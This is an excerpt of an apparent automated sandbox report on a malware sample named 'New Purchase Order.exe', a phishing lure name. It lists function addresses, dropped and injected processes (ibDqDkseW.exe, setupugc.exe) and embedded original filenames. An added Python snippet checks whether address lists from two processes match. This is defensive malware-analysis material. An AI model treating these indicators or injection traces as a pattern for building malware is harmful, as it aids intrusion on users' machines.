            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011429A08_2_011429A0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0114A8408_2_0114A840
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011428408_2_01142840
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011268B88_2_011268B8
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0116E8F08_2_0116E8F0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011FAB408_2_011FAB40
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011F6BD78_2_011F6BD7
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0113EA808_2_0113EA80
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011DCD1F8_2_011DCD1F
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0114AD008_2_0114AD00
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01158DBF8_2_01158DBF
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0113ADE08_2_0113ADE0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01140C008_2_01140C00
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011E0CB58_2_011E0CB5
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01130CF28_2_01130CF2
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01160F308_2_01160F30
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011E2F308_2_011E2F30
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01182F288_2_01182F28
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011B4F408_2_011B4F40
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011BEFA08_2_011BEFA0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01132FC88_2_01132FC8
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011FEE268_2_011FEE26
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01140E598_2_01140E59
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01152E908_2_01152E90
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011FCE938_2_011FCE93
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011FEEDB8_2_011FEEDB
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0120B16B8_2_0120B16B
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0112F1728_2_0112F172
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0117516C8_2_0117516C
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0114B1B08_2_0114B1B0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011EF0CC8_2_011EF0CC
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011470C08_2_011470C0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011F70E98_2_011F70E9
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011FF0E08_2_011FF0E0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011F132D8_2_011F132D
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0112D34C8_2_0112D34C
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0118739A8_2_0118739A
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011452A08_2_011452A0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0115B2C08_2_0115B2C0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0115D2F08_2_0115D2F0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011E12ED8_2_011E12ED
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011F75718_2_011F7571
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011DD5B08_2_011DD5B0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_012095C38_2_012095C3
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011FF43F8_2_011FF43F
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011314608_2_01131460
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011FF7B08_2_011FF7B0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011856308_2_01185630
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011F16CC8_2_011F16CC
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011D59108_2_011D5910
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011499508_2_01149950
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0115B9508_2_0115B950
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011AD8008_2_011AD800
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011438E08_2_011438E0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011FFB768_2_011FFB76
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0115FB808_2_0115FB80
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011B5BF08_2_011B5BF0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0117DBF98_2_0117DBF9
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011FFA498_2_011FFA49
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011F7A468_2_011F7A46
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011B3A6C8_2_011B3A6C
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011DDAAC8_2_011DDAAC
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01185AA08_2_01185AA0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011E1AA38_2_011E1AA3
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011EDAC68_2_011EDAC6
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011F1D5A8_2_011F1D5A
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01143D408_2_01143D40
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011F7D738_2_011F7D73
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0115FDC08_2_0115FDC0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011B9C328_2_011B9C32
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011FFCF28_2_011FFCF2
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011FFF098_2_011FFF09
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01141F928_2_01141F92
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011FFFB18_2_011FFFB1
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01103FD28_2_01103FD2
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01103FD58_2_01103FD5
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01149EB08_2_01149EB0
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeCode function: 9_2_0312D5BC9_2_0312D5BC
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeCode function: 9_2_07ABC7AC9_2_07ABC7AC
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeCode function: 9_2_07ABA7289_2_07ABA728
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeCode function: 9_2_07ABA7189_2_07ABA718
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeCode function: 9_2_07AB76309_2_07AB7630
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeCode function: 9_2_07AB761F9_2_07AB761F
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeCode function: 9_2_07AB55509_2_07AB5550
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeCode function: 9_2_07AB51089_2_07AB5108
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeCode function: 9_2_07AB51189_2_07AB5118
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeCode function: 9_2_07AB6D589_2_07AB6D58
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeCode function: 9_2_07AB7B309_2_07AB7B30
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeCode function: 9_2_07AB7B409_2_07AB7B40
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeCode function: 14_2_0149010014_2_01490100
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeCode function: 14_2_014E600014_2_014E6000
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeCode function: 14_2_015202C014_2_015202C0
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeCode function: 14_2_014A053514_2_014A0535
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeCode function: 14_2_014C475014_2_014C4750
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeCode function: 14_2_014A077014_2_014A0770
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeCode function: 14_2_0149C7C014_2_0149C7C0
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeCode function: 14_2_014BC6E014_2_014BC6E0
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeCode function: 14_2_014B696214_2_014B6962
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeCode function: 14_2_014A29A014_2_014A29A0
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeCode function: 14_2_014AA84014_2_014AA840
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeCode function: 14_2_014A284014_2_014A2840
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeCode function: 14_2_014CE8F014_2_014CE8F0
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeCode function: 14_2_014D889014_2_014D8890
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeCode function: 14_2_014868B814_2_014868B8
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeCode function: 14_2_0149EA8014_2_0149EA80
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeCode function: 14_2_014AED7A14_2_014AED7A
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeCode function: 14_2_014AAD0014_2_014AAD00
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeCode function: 14_2_014A8DC014_2_014A8DC0
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeCode function: 14_2_0149ADE014_2_0149ADE0
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeCode function: 14_2_014B8DBF14_2_014B8DBF
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeCode function: 14_2_014A0C0014_2_014A0C00
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeCode function: 14_2_01490CF214_2_01490CF2
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeCode function: 14_2_01514F4014_2_01514F40
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeCode function: 14_2_014E2F2814_2_014E2F28
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeCode function: 14_2_014C0F3014_2_014C0F30
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeCode function: 14_2_01492FC814_2_01492FC8
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeCode function: 14_2_0151EFA014_2_0151EFA0
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeCode function: 14_2_014A0E5914_2_014A0E59
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeCode function: 14_2_014B2E9014_2_014B2E90
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeCode function: 14_2_014D516C14_2_014D516C
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeCode function: 14_2_0148F17214_2_0148F172
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeCode function: 14_2_014AB1B014_2_014AB1B0
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeCode function: 14_2_0148D34C14_2_0148D34C
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeCode function: 14_2_014A33F314_2_014A33F3
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeCode function: 14_2_014BB2C014_2_014BB2C0
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeCode function: 14_2_014BD2F014_2_014BD2F0
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeCode function: 14_2_014A52A014_2_014A52A0
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeCode function: 14_2_0149146014_2_01491460
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeCode function: 14_2_014E74E014_2_014E74E0
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeCode function: 14_2_014A349714_2_014A3497
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeCode function: 14_2_014AB73014_2_014AB730
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeCode function: 14_2_014A995014_2_014A9950
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeCode function: 14_2_014BB95014_2_014BB950
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeCode function: 14_2_014A599014_2_014A5990
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeCode function: 14_2_0150D80014_2_0150D800
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeCode function: 14_2_014A38E014_2_014A38E0
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeCode function: 14_2_01515BF014_2_01515BF0
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeCode function: 14_2_014DDBF914_2_014DDBF9
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeCode function: 14_2_014BFB8014_2_014BFB80
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeCode function: 14_2_01513A6C14_2_01513A6C
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeCode function: 14_2_014A3D4014_2_014A3D40
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeCode function: 14_2_014BFDC014_2_014BFDC0
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeCode function: 14_2_01519C3214_2_01519C32
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeCode function: 14_2_014B9C2014_2_014B9C20
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeCode function: 14_2_014A1F9214_2_014A1F92
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeCode function: 14_2_014A9EB014_2_014A9EB0
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeCode function: 14_2_0042EB9314_2_0042EB93
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_0390E3F017_2_0390E3F0
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_039C03E617_2_039C03E6
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_039BA35217_2_039BA352
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_039802C017_2_039802C0
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_039A027417_2_039A0274
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_039C01AA17_2_039C01AA
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_039B41A217_2_039B41A2
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_039B81CC17_2_039B81CC
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_0399A11817_2_0399A118
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_038F010017_2_038F0100
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_0398815817_2_03988158
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_0399200017_2_03992000
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_038FC7C017_2_038FC7C0
Source: C:\Windows\SysWOW64\setupugc.exe | Code function: 17_2_03924750
Source: C:\Windows\SysWOW64\setupugc.exe | Code function: 17_2_03900770
Source: C:\Windows\SysWOW64\setupugc.exe | Code function: 17_2_0391C6E0
Source: C:\Windows\SysWOW64\setupugc.exe | Code function: 17_2_039C0591
Source: C:\Windows\SysWOW64\setupugc.exe | Code function: 17_2_03900535
Source: C:\Windows\SysWOW64\setupugc.exe | Code function: 17_2_039AE4F6
Source: C:\Windows\SysWOW64\setupugc.exe | Code function: 17_2_039A4420
Source: C:\Windows\SysWOW64\setupugc.exe | Code function: 17_2_039B2446
Source: C:\Windows\SysWOW64\setupugc.exe | Code function: 17_2_039B6BD7
Source: C:\Windows\SysWOW64\setupugc.exe | Code function: 17_2_039BAB40
Source: C:\Windows\SysWOW64\setupugc.exe | Code function: 17_2_038FEA80
Source: C:\Windows\SysWOW64\setupugc.exe | Code function: 17_2_039029A0
Source: C:\Windows\SysWOW64\setupugc.exe | Code function: 17_2_039CA9A6
Source: C:\Windows\SysWOW64\setupugc.exe | Code function: 17_2_03916962
Source: C:\Windows\SysWOW64\setupugc.exe | Code function: 17_2_038E68B8
Source: C:\Windows\SysWOW64\setupugc.exe | Code function: 17_2_0392E8F0
Source: C:\Windows\SysWOW64\setupugc.exe | Code function: 17_2_0390A840
Source: C:\Windows\SysWOW64\setupugc.exe | Code function: 17_2_03902840
Source: C:\Windows\SysWOW64\setupugc.exe | Code function: 17_2_0397EFA0
Source: C:\Windows\SysWOW64\setupugc.exe | Code function: 17_2_038F2FC8
Source: C:\Windows\SysWOW64\setupugc.exe | Code function: 17_2_03920F30
Source: C:\Windows\SysWOW64\setupugc.exe | Code function: 17_2_039A2F30
Source: C:\Windows\SysWOW64\setupugc.exe | Code function: 17_2_03942F28
Source: C:\Windows\SysWOW64\setupugc.exe | Code function: 17_2_03974F40
Source: C:\Windows\SysWOW64\setupugc.exe | Code function: 17_2_03912E90
Source: C:\Windows\SysWOW64\setupugc.exe | Code function: 17_2_039BCE93
Source: C:\Windows\SysWOW64\setupugc.exe | Code function: 17_2_039BEEDB
Source: C:\Windows\SysWOW64\setupugc.exe | Code function: 17_2_039BEE26
Source: C:\Windows\SysWOW64\setupugc.exe | Code function: 17_2_03900E59
Source: C:\Windows\SysWOW64\setupugc.exe | Code function: 17_2_03918DBF
Source: C:\Windows\SysWOW64\setupugc.exe | Code function: 17_2_038FADE0
Source: C:\Windows\SysWOW64\setupugc.exe | Code function: 17_2_0399CD1F
Source: C:\Windows\SysWOW64\setupugc.exe | Code function: 17_2_0390AD00
Source: C:\Windows\SysWOW64\setupugc.exe | Code function: 17_2_039A0CB5
Source: C:\Windows\SysWOW64\setupugc.exe | Code function: 17_2_038F0CF2
Source: C:\Windows\SysWOW64\setupugc.exe | Code function: 17_2_03900C00
Source: C:\Windows\SysWOW64\setupugc.exe | Code function: 17_2_0394739A
Source: C:\Windows\SysWOW64\setupugc.exe | Code function: 17_2_039B132D
Source: C:\Windows\SysWOW64\setupugc.exe | Code function: 17_2_038ED34C
Source: C:\Windows\SysWOW64\setupugc.exe | Code function: 17_2_039052A0
Source: C:\Windows\SysWOW64\setupugc.exe | Code function: 17_2_0391B2C0
Source: C:\Windows\SysWOW64\setupugc.exe | Code function: 17_2_0391D2F0
Source: C:\Windows\SysWOW64\setupugc.exe | Code function: 17_2_039A12ED
Source: C:\Windows\SysWOW64\setupugc.exe | Code function: 17_2_0390B1B0
Source: C:\Windows\SysWOW64\setupugc.exe | Code function: 17_2_039CB16B
Source: C:\Windows\SysWOW64\setupugc.exe | Code function: 17_2_038EF172
Source: C:\Windows\SysWOW64\setupugc.exe | Code function: 17_2_0393516C
Source: C:\Windows\SysWOW64\setupugc.exe | Code function: 17_2_039070C0
Source: C:\Windows\SysWOW64\setupugc.exe | Code function: 17_2_039AF0CC
Source: C:\Windows\SysWOW64\setupugc.exe | Code function: 17_2_039B70E9
Source: C:\Windows\SysWOW64\setupugc.exe | Code function: 17_2_039BF0E0
Source: C:\Windows\SysWOW64\setupugc.exe | Code function: 17_2_039BF7B0
Source: C:\Windows\SysWOW64\setupugc.exe | Code function: 17_2_039B16CC
Source: C:\Windows\SysWOW64\setupugc.exe | Code function: 17_2_03945630
Source: C:\Windows\SysWOW64\setupugc.exe | Code function: 17_2_0399D5B0
Source: C:\Windows\SysWOW64\setupugc.exe | Code function: 17_2_039C95C3
Source: C:\Windows\SysWOW64\setupugc.exe | Code function: 17_2_039B7571
Source: C:\Windows\SysWOW64\setupugc.exe | Code function: 17_2_039BF43F
Source: C:\Windows\SysWOW64\setupugc.exe | Code function: 17_2_038F1460
Source: C:\Windows\SysWOW64\setupugc.exe | Code function: 17_2_0391FB80
Source: C:\Windows\SysWOW64\setupugc.exe | Code function: 17_2_03975BF0
Source: C:\Windows\SysWOW64\setupugc.exe | Code function: 17_2_0393DBF9
Source: C:\Windows\SysWOW64\setupugc.exe | Code function: 17_2_039BFB76
Source: C:\Windows\SysWOW64\setupugc.exe | Code function: 17_2_03945AA0
Source: C:\Windows\SysWOW64\setupugc.exe | Code function: 17_2_0399DAAC
Source: C:\Windows\SysWOW64\setupugc.exe | Code function: 17_2_039A1AA3
Source: C:\Windows\SysWOW64\setupugc.exe | Code function: 17_2_039ADAC6
Source: C:\Windows\SysWOW64\setupugc.exe | Code function: 17_2_039BFA49
Source: C:\Windows\SysWOW64\setupugc.exe | Code function: 17_2_039B7A46
Source: C:\Windows\SysWOW64\setupugc.exe | Code function: 17_2_03973A6C
Source: C:\Windows\SysWOW64\setupugc.exe | Code function: 17_2_03995910
Source: C:\Windows\SysWOW64\setupugc.exe | Code function: 17_2_03909950
Source: C:\Windows\SysWOW64\setupugc.exe | Code function: 17_2_0391B950
Source: C:\Windows\SysWOW64\setupugc.exe | Code function: 17_2_039038E0
Source: C:\Windows\SysWOW64\setupugc.exe | Code function: 17_2_0396D800
Source: C:\Windows\SysWOW64\setupugc.exe | Code function: 17_2_03901F92
Source: C:\Windows\SysWOW64\setupugc.exe | Code function: 17_2_039BFFB1
Source: C:\Windows\SysWOW64\setupugc.exe | Code function: 17_2_038C3FD5
Source: C:\Windows\SysWOW64\setupugc.exe | Code function: 17_2_038C3FD2
Source: C:\Windows\SysWOW64\setupugc.exe | Code function: 17_2_039BFF09
Source: C:\Windows\SysWOW64\setupugc.exe | Code function: 17_2_03909EB0
Source: C:\Windows\SysWOW64\setupugc.exe | Code function: 17_2_0391FDC0
Source: C:\Windows\SysWOW64\setupugc.exe | Code function: 17_2_039B1D5A
Source: C:\Windows\SysWOW64\setupugc.exe | Code function: 17_2_03903D40
Source: C:\Windows\SysWOW64\setupugc.exe | Code function: 17_2_039B7D73
Source: C:\Windows\SysWOW64\setupugc.exe | Code function: 17_2_039BFCF2
Source: C:\Windows\SysWOW64\setupugc.exe | Code function: 17_2_03979C32
Source: C:\Windows\SysWOW64\setupugc.exe | Code function: 17_2_02E61C40
Source: C:\Windows\SysWOW64\setupugc.exe | Code function: 17_2_02E5CB80
Source: C:\Windows\SysWOW64\setupugc.exe | Code function: 17_2_02E5CB78
Source: C:\Windows\SysWOW64\setupugc.exe | Code function: 17_2_02E5AE20
Source: C:\Windows\SysWOW64\setupugc.exe | Code function: 17_2_02E5CDA0
Source: C:\Windows\SysWOW64\setupugc.exe | Code function: 17_2_02E652D0
Source: C:\Windows\SysWOW64\setupugc.exe | Code function: 17_2_02E634C0
Source: C:\Windows\SysWOW64\setupugc.exe | Code function: 17_2_02E634BB
Source: C:\Windows\SysWOW64\setupugc.exe | Code function: 17_2_02E7B8D0
Source: C:\Windows\SysWOW64\setupugc.exe | Code function: 17_2_0375E563
Source: C:\Windows\SysWOW64\setupugc.exe | Code function: 17_2_0375E448
Source: C:\Windows\SysWOW64\setupugc.exe | Code function: 17_2_0375D968
Source: C:\Windows\SysWOW64\setupugc.exe | Code function: 17_2_0375E8FC
Source: C:\Windows\SysWOW64\setupugc.exe | Code function: String function: 0397F290 appears 103 times
Source: C:\Windows\SysWOW64\setupugc.exe | Code function: String function: 038EB970 appears 262 times
Source: C:\Windows\SysWOW64\setupugc.exe | Code function: String function: 03947E54 appears 107 times
Source: C:\Windows\SysWOW64\setupugc.exe | Code function: String function: 0396EA12 appears 86 times
Source: C:\Windows\SysWOW64\setupugc.exe | Code function: String function: 03935130 appears 58 times
Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exe | Code function: String function: 014E7E54 appears 96 times
Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exe | Code function: String function: 0150EA12 appears 36 times
Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: String function: 011BF290 appears 103 times
Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: String function: 01175130 appears 58 times
Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: String function: 011AEA12 appears 86 times
Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: String function: 01187E54 appears 107 times
Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: String function: 0112B970 appears 262 times
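The five "String function" sites the report lists for setupugc.exe and for New Purchase Order.exe share their low 16 address bits and their occurrence counts (103, 262, 107, 86, 58) and differ by a constant 0x27C0000, which is what one unpacked image mapped at two base addresses looks like. The following added example (not part of the Joe Sandbox report) turns that observation into a check. It assumes Windows maps images on 64 KiB boundaries, so an address modulo 0x10000 survives relocation, and that those page offsets are unique among the listed functions; the address and count values are copied from the lines above.

```python
# Added example, not from the report: pair "String function X appears N times" entries
# from two processes and test whether they describe one code image at two base addresses.

# Assumption: image bases are 64 KiB aligned (Windows allocation granularity), so the
# low 16 bits of a function address are the same in every mapping of the same image.
ALLOC_GRANULARITY = 0x10000

# Values copied from the report: (function address, occurrence count)
SETUPUGC = [(0x0397F290, 103), (0x038EB970, 262), (0x03947E54, 107),
            (0x0396EA12, 86), (0x03935130, 58)]
PURCHASE_ORDER = [(0x011BF290, 103), (0x0112B970, 262), (0x01187E54, 107),
                  (0x011AEA12, 86), (0x01175130, 58)]
IBDQDKSEW = [(0x014E7E54, 96), (0x0150EA12, 36)]


def pair_by_offset(a, b):
    """Pair entries of a and b whose address modulo the allocation granularity is equal.
    Assumes those offsets are unique within a list (true for the five values above)."""
    by_off = {addr % ALLOC_GRANULARITY: (addr, n) for addr, n in a}
    return [(by_off[addr % ALLOC_GRANULARITY], (addr, n))
            for addr, n in b if addr % ALLOC_GRANULARITY in by_off]


def relocation_delta(a, b):
    """Return the single base-address difference (a minus b) if every paired function
    agrees on it; otherwise None (no pairs, or inconsistent deltas)."""
    deltas = {x[0] - y[0] for x, y in pair_by_offset(a, b)}
    return deltas.pop() if len(deltas) == 1 else None


def same_unpacked_image(a, b):
    """True when the delta is constant and each paired function appears the same
    number of times, i.e. the analyser saw the same code in both processes."""
    if relocation_delta(a, b) is None:
        return False
    return all(x[1] == y[1] for x, y in pair_by_offset(a, b))


if __name__ == "__main__":
    for label, other in (("New Purchase Order.exe", PURCHASE_ORDER), ("ibDqDkseW.exe", IBDQDKSEW)):
        delta = relocation_delta(SETUPUGC, other)
        print("setupugc.exe vs %-24s delta=%s same image=%s"
              % (label, hex(delta) if delta is not None else None,
                 same_unpacked_image(SETUPUGC, other)))
```

For the dropped copy ibDqDkseW.exe the two listed sites also agree on a constant delta (0x2460000) but their counts differ, so the function reports the delta and rejects the "same image" claim; that is the caveat to keep in mind when the analyser covered less of one process than of another.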
Source: New Purchase Order.exe, 00000000.00000002.1694702784.0000000002B61000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameGB-lesson-forms.dll@ vs New Purchase Order.exe
Source: New Purchase Order.exe, 00000000.00000002.1694702784.0000000002BAA000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameGB-lesson-forms.dll@ vs New Purchase Order.exe
Source: New Purchase Order.exe, 00000000.00000002.1693627231.0000000000C9E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs New Purchase Order.exe
Source: New Purchase Order.exe, 00000000.00000002.1696979207.0000000003C5C000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameTyrone.dll8 vs New Purchase Order.exe
Source: New Purchase Order.exe, 00000000.00000002.1700994980.0000000007280000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameTyrone.dll8 vs New Purchase Order.exe
Source: New Purchase Order.exe, 00000000.00000002.1701251700.00000000075BD000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameLOAk.exe@ vs New Purchase Order.exe
Source: New Purchase Order.exe, 00000000.00000002.1700185092.0000000005520000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameGB-lesson-forms.dll@ vs New Purchase Order.exe
Source: New Purchase Order.exe, 00000008.00000002.1910720585.0000000000C98000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSETUPUGC.EXEj% vs New Purchase Order.exe
Source: New Purchase Order.exe, 00000008.00000002.1911207910.000000000122D000.00000040.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs New Purchase Order.exe
